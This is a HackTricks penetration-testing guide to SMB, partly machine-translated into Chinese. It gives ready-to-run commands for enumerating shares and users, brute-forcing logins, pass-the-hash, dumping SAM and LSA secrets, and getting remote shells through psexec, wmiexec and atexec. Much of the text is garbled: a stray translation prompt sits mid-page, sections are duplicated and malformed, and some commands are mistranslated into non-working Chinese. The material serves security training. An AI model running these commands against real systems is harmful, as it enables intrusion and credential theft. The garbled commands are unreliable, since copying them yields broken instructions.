hacktricks/network-services-pentesting/pentesting-smb.md

32 KiB
Raw Blame History

139,445 - SMB 渗透测试

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

端口 139

NetBIOS 代表 网络基本输入输出系统。它是一种软件协议允许局域网LAN上的应用程序、个人电脑和桌面电脑与网络硬件进行通信并在网络上传输数据。在 NetBIOS 网络上运行的软件应用程序通过它们的 NetBIOS 名称定位和识别彼此。NetBIOS 名称最长可达 16 个字符,并且通常与计算机名称分开。当一个应用程序(客户端)通过 TCP 端口 139 发送命令“呼叫”另一个客户端(服务器)时,它们会启动一个 NetBIOS 会话。(摘自这里

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

端口445

虽然端口139在技术上被称为“NBT over IP”但端口445是“SMB over IP”。SMB代表“Server Message Blocks”。现代语言中Server Message Block也被称为Common Internet File System。该系统作为应用层网络协议主要用于在网络上的节点之间提供共享文件、打印机、串口和其他通信方式。

例如在Windows上SMB可以直接在TCP/IP上运行而无需NetBIOS over TCP/IP。正如你所指出的这将使用端口445。在其他系统上你会发现服务和应用程序使用端口139。这意味着SMB正在使用NetBIOS over TCP/IP。摘自这里

445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

SMB

Server Message Block (SMB) 是一种客户端-服务器协议,用于管理对文件、整个目录和其他网络资源(如打印机、路由器或网络接口)的访问。该协议的主要应用领域是特定的Windows操作系统系列其网络服务以向下兼容的方式支持SMB - 这意味着具有较新版本的设备可以轻松与安装有较旧的Microsoft操作系统的设备进行通信。
通过免费软件项目Samba还可以在Linux和Unix发行版中使用SMB从而实现跨平台的SMB通信。

SMB服务器可以将其本地文件系统的任意部分作为共享提供。因此,对客户端可见的层次结构部分上独立于服务器上的结构访问权限访问控制列表ACL)定义。它们可以根据**执行读取完全访问等属性以细粒度的方式**对个别用户或用户组进行控制。ACL是基于共享定义的,因此与在服务器上本地分配的权限不对应。

IPC$ 共享

来自书籍 Network Security Assessment 3rd edition

通过匿名空会话您可以访问IPC$共享并与通过命名管道公开的服务进行交互。Kali Linux中的enum4linux实用程序非常有用使用它您可以获取以下信息

  • 操作系统信息
  • 父域的详细信息
  • 本地用户和组列表
  • 可用SMB共享的详细信息
  • 有效的系统安全策略

什么是NTLM

如果您不知道什么是NTLM或者想了解它是如何工作和如何滥用它的您会发现这个关于NTLM的页面非常有趣,其中解释了该协议的工作原理以及如何利用它:

{% content-ref url="../windows-hardening/ntlm/" %} ntlm {% endcontent-ref %}

服务器枚举

扫描网络以搜索主机:

nbtscan -r 192.168.0.1/24

SMB 服务器版本

为了寻找可能的 SMB 版本漏洞,了解正在使用的版本非常重要。如果这些信息在其他工具中没有显示,你可以:

  • 使用 MSF 辅助模块 _auxiliary/scanner/smb/smb_version
  • 或者使用以下脚本:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1

搜索漏洞

To search for exploits, you can use various tools and resources. Here are some common methods:

  • Exploit Databases: There are several online databases that catalog known exploits. Examples include Exploit-DB, Metasploit, and Packet Storm. You can search these databases using relevant keywords or specific vulnerability identifiers.

  • Vulnerability Scanners: Tools like Nessus, OpenVAS, and Nexpose can scan your target network or system for known vulnerabilities and provide a list of potential exploits.

  • Security Blogs and Forums: Many security researchers and professionals share their findings and exploits on blogs and forums. Websites like GitHub, Reddit, and Stack Overflow can be valuable sources of information.

  • Exploit Frameworks: Frameworks like Metasploit provide a collection of exploits, payloads, and tools for penetration testing. You can search within these frameworks for specific exploits.

Remember, when searching for exploits, it's important to ensure that you have proper authorization and legal permission to perform any testing or exploitation activities.

msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb

可能的凭据

用户名 常见密码
(空白) (空白)
guest (空白)
Administrator, admin (空白), password, administrator, admin
arcserve arcserve, backup
tivoli, tmersrvd tivoli, tmersrvd, admin
backupexec, backup backupexec, backup, arcada
test, lab, demo password, test, lab, demo

SMB环境信息

获取信息

#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

枚举用户、组和已登录用户

这些信息应该已经从enum4linux和enum4linux-ng中收集到了

crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups

枚举本地用户

Impacket

lookupsid.py -no-pass hostname.local

以下是关于黑客技术的一本书中的内容。以下内容来自文件network-services-pentesting/pentesting-smb.md。将相关的英文文本翻译成中文并返回翻译结果保持完全相同的markdown和html语法。请不要翻译代码、黑客技术名称、黑客术语、云/SaaS平台名称如Workspace、aws、gcp...、泄漏一词、渗透测试和markdown标签。此外请不要添加任何额外的内容只需提供翻译和markdown语法即可。

for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Metasploit - 枚举本地用户

use auxiliary/scanner/smb/smb_lookupsid
set rhosts 主机名.local
run

Enumerating LSARPC and SAMR rpcclient

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %} rpcclient-enumeration.md {% endcontent-ref %}

GUI connection from linux

In the terminal:

xdg-open smb://cascade.htb/

In file browser window (nautilus, thunar, etc)

smb://friendzone.htb/general/

Shared Folders Enumeration

List shared folders

It is always recommended to look if you can access to anything, if you don't have credentials try using null credentials/guest user.

```markdown

smbclient --no-pass -L // # 空用户 smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // # 如果省略密码,将提示输入。使用 --pw-nt-hash提供的密码是NT哈希值

smbmap -H [-P ] # 空用户 smbmap -u "username" -p "password" -H [-P ] # 凭证 smbmap -u "username" -p ":" -H [-P ] # Pass-the-Hash smbmap -R -u "username" -p "password" -H [-P ] # 递归列表

crackmapexec smb -u '' -p '' --shares # 空用户 crackmapexec smb -u 'username' -p 'password' --shares # 访客用户 crackmapexec smb -u 'username' -H '' --shares # 访客用户

Connect/List a shared folder

# 使用smbclient进行连接
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #如果省略密码,将会提示输入。使用--pw-nt-hash提供的密码是NT哈希值
# 使用--no-pass -c 'recurse;ls' 以smbclient递归列出文件列表

# 使用smbmap进行列出不指定文件夹将列出所有内容
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # 递归列出
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # 非递归列出
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] # 使用哈希传递密码

Manually enumerate windows shares and connect to them

It may be possible that you are restricted to display any shares of the host machine and when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a short to try to manually connect to a share. To enumerate the shares manually you might want to look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME, when using a valid session (e.g. null session or valid credentials). These may indicate whether the share exists and you do not have access to it or the share does not exist at all.

Common share names for windows targets are

  • C$
  • D$
  • ADMIN$
  • IPC$
  • PRINT$
  • FAX$
  • SYSVOL
  • NETLOGON

(Common share names from Network Security Assessment 3rd edition)

You can try to connect to them by using the following command

```markdown
使用空会话连接到Windows共享
smbclient -U '%' -N \\\\<IP>\\<SHARE>
使用身份验证会话连接到Windows共享将提示输入密码
smbclient -U '<USER>' \\\\<IP>\\<SHARE>

or this script (using a null session)

```bash
#/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

if [[ -z $output ]]; then
echo "[+] 可以创建一个空会话来访问 $share" # 如果命令成功执行,没有输出,因此假设已创建会话
else
echo $output # 输出错误信息(例如 NT_STATUS_ACCESS_DENIED 或 NT_STATUS_BAD_NETWORK_NAME
fi
done

examples

```markdown
## SMB服务渗透

### smbclient命令

使用`smbclient`命令可以与SMB服务进行交互。以下是一些常用的`smbclient`命令示例:

- `smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here`:返回`NT_STATUS_BAD_NETWORK_NAME`错误。
- `smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$`:返回`NT_STATUS_ACCESS_DENIED`错误,或者甚至会给你一个会话。
<h2>SMB服务渗透</h2>

<h3>smbclient命令</h3>

<p>使用<code>smbclient</code>命令可以与SMB服务进行交互。以下是一些常用的<code>smbclient</code>命令示例:</p>

<ul>
<li><code>smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here</code>:返回<code>NT_STATUS_BAD_NETWORK_NAME</code>错误。</li>
<li><code>smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$</code>:返回<code>NT_STATUS_ACCESS_DENIED</code>错误,或者甚至会给你一个会话。</li>
</ul>

### Mount a shared folder

```bash
```shell
挂载 -t cifs //x.x.x.x/share /mnt/share
挂载 -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

### **Download files**

Read previous sections to learn how to connect with credentials/Pass-the-Hash.

```bash
#搜索并下载文件
sudo smbmap -R 文件夹 -H <IP> -A <文件名> -q # 以递归模式搜索文件并将其下载到 /usr/share/smbmap 中
# 下载全部文件
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
# 将所有文件下载到当前目录

Commands:

  • mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
  • recurse: toggles recursion on (default: off)
  • prompt: toggles prompting for filenames off (default: on)
  • mget: copies all files matching the mask from host to client machine

(Information from the manpage of smbclient)

Snaffler.exe -s -d domain.local -o snaffler.log -v data


使用Snaffler.exe工具执行以下命令

Snaffler.exe -s -d domain.local -o snaffler.log -v data


- `-s` 参数表示启用扫描模式。
- `-d domain.local` 参数指定要扫描的目标域名。
- `-o snaffler.log` 参数将扫描结果输出到名为snaffler.log的日志文件中。
- `-v data` 参数表示详细输出扫描结果的数据信息。
  • CrackMapExec spider.
  • -M spider_plus [--share <share_name>]
  • --pattern txt

sudo crackmapexec smb 10.10.10.10 -u 用户名 -p 密码 -M spider_plus --share '部门共享'

Specially interesting from shares are the files called Registry.xml as they may contain passwords for users configured with autologon via Group Policy. Or web.config files as they contains credentials.

{% hint style="info" %} The SYSVOL share is readable by all authenticated users in the domain. In there you may find many different batch, VBScript, and PowerShell scripts.
You should check the scripts inside of it as you might find sensitive info such as passwords. {% endhint %}

Read Registry

You may be able to read the registry using some discovered credentials. Impacket reg.py allows you to try:

sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s


sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s

Post Exploitation

The default config of a Samba server is usually located in /etc/samba/smb.conf and might have some dangerous configs:

Setting Description
browseable = yes Allow listing available shares in the current share?
read only = no Forbid the creation and modification of files?
writable = yes Allow users to create and modify files?
guest ok = yes Allow connecting to the service without using a password?
enable privileges = yes Honor privileges assigned to specific SID?
create mask = 0777 What permissions must be assigned to the newly created files?
directory mask = 0777 What permissions must be assigned to the newly created directories?
logon script = script.sh What script needs to be executed on the user's login?
magic script = script.sh Which script should be executed when the script gets closed?
magic output = script.out Where the output of the magic script needs to be stored?

The command smbstatus gives information about the server and about who is connected.

Authenticate using Kerberos

You can authenticate to kerberos using the tools smbclient and rpcclient:

```markdown
## SMB (Server Message Block) 渗透测试

### smbclient --kerberos //ws01win10.domain.com/C$

使用 `smbclient` 命令与 SMB 服务器建立连接,并使用 Kerberos 身份验证。连接的目标是 `ws01win10.domain.com` 主机上的共享文件夹 `C$`### rpcclient -k ws01win10.domain.com

使用 `rpcclient` 命令与 SMB 服务器建立连接,并使用 Kerberos 身份验证。连接的目标是 `ws01win10.domain.com` 主机。
<h2>SMB (Server Message Block) 渗透测试</h2>

<h3>smbclient --kerberos //ws01win10.domain.com/C$</h3>

<p>使用 <code>smbclient</code> 命令与 SMB 服务器建立连接,并使用 Kerberos 身份验证。连接的目标是 <code>ws01win10.domain.com</code> 主机上的共享文件夹 <code>C$</code></p>

<h3>rpcclient -k ws01win10.domain.com</h3>

<p>使用 <code>rpcclient</code> 命令与 SMB 服务器建立连接,并使用 Kerberos 身份验证。连接的目标是 <code>ws01win10.domain.com</code> 主机。</p>

## **Execute Commands**

### **crackmapexec**

crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:

```bash
```markdown
安装crackmapexec
apt-get install crackmapexec
执行Powershell命令
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
执行cmd命令
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
使用Pass-the-Hash技术
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami
使用不同的执行方法:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --exec-method {mmcexec,smbexec,atexec,wmiexec}
获取SAM信息
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam
获取LSASS内存哈希
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa
获取会话信息:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions
获取已登录用户:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users
枚举磁盘:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks
枚举用户:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users
枚举组:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups
枚举本地组:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups
获取密码策略:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol
使用RID暴力破解
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute
使用Pass-The-Hash技术
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH>

### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)

Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
#如果没有提供密码,将会提示输入
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # 使用Pass-the-Hash

Using parameter-k you can authenticate against kerberos instead of NTLM

wmiexec/dcomexec

Stealthily execute a command shell without touching the disk or running a new service using DCOM via port 135.
In kali it is located on /usr/share/doc/python3-impacket/examples/

#如果没有提供密码,将会提示输入密码
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #提示输入密码
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #传递哈希
#您可以在命令的末尾添加要执行的CMD命令如果不这样做将提示一个半交互式shell

Using parameter-k you can authenticate against kerberos instead of NTLM

#如果没有提供密码,将会提示输入密码
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#您可以在命令的末尾添加要执行的CMD命令如果不这样做将提示一个半交互式shell

AtExec

Execute commands via the Task Scheduler (using \pipe\atsvc via SMB).
In kali it is located on /usr/share/doc/python3-impacket/examples/

./atexec.py [[domain/]username[:password]@] "command" ./atexec.py -hashes LM:NT administrator@10.10.10.175 "whoami"


./atexec.py [[域/]用户名[:密码]@]<目标名称或地址> "命令" ./atexec.py -hashes LM:NT administrator@10.10.10.175 "whoami"

Impacket reference

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

Bruteforce users credentials

This is not recommended, you could block an account if you exceed the maximum allowed tries

nmap --script smb-brute -p 445 ridenum.py 500 50000 /root/passwds.txt #使用ridenum.py脚本对RID进行暴力破解然后尝试对每个用户名进行暴力破解

SMB relay attack

This attack uses the Responder toolkit to capture SMB authentication sessions on an internal network, and relays them to a target machine. If the authentication session is successful, it will automatically drop you into a system shell.
More information about this attack here.

SMB-Trap

The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: img src="\\10.10.10.10\path\image.jpg"

This happens with the functions:

  • URLDownloadToFile
  • URLDownloadToCache
  • URLOpenStream
  • URLOpenBlockingStream

Which are used by some browsers and tools (like Skype)

From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html

SMBTrap using MitMf

From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html

NTLM Theft

Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an SMB relay attack.

See: ntlm_theft

HackTricks Automatic Commands

协议名称SMB
端口号137、138、139
协议描述:服务器消息块

条目1
名称:笔记
描述SMB的笔记
注意:|
虽然端口139在技术上被称为“NBT over IP”端口445是“SMB over IP”。SMB代表“服务器消息块”。现代语言中服务器消息块也被称为常见的Internet文件系统。该系统作为应用层网络协议主要用于在网络上的节点之间提供共享访问文件、打印机、串口和其他通信方式。

#每当我看到一个开放的SMB端口时我按照以下顺序运行这些命令

无凭证
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}

有凭证
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.xyz/pentesting/pentesting-smb

条目2
名称Enum4Linux
描述常规SMB扫描
命令enum4linux -a {IP}

条目3
名称Nmap SMB扫描1
描述使用Nmap进行SMB漏洞扫描
命令nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

条目4
名称Nmap SMB扫描2
描述使用Nmap进行SMB漏洞扫描不太具体
命令nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}

条目5
名称Hydra暴力破解
描述:需要用户名
命令hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

条目6
名称SMB/SMB2 139/445无需运行msfconsole的MFS枚举
描述SMB/SMB2 139/445枚举无需运行msfconsole
注意来源于https://github.com/carlospolop/legion
命令msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥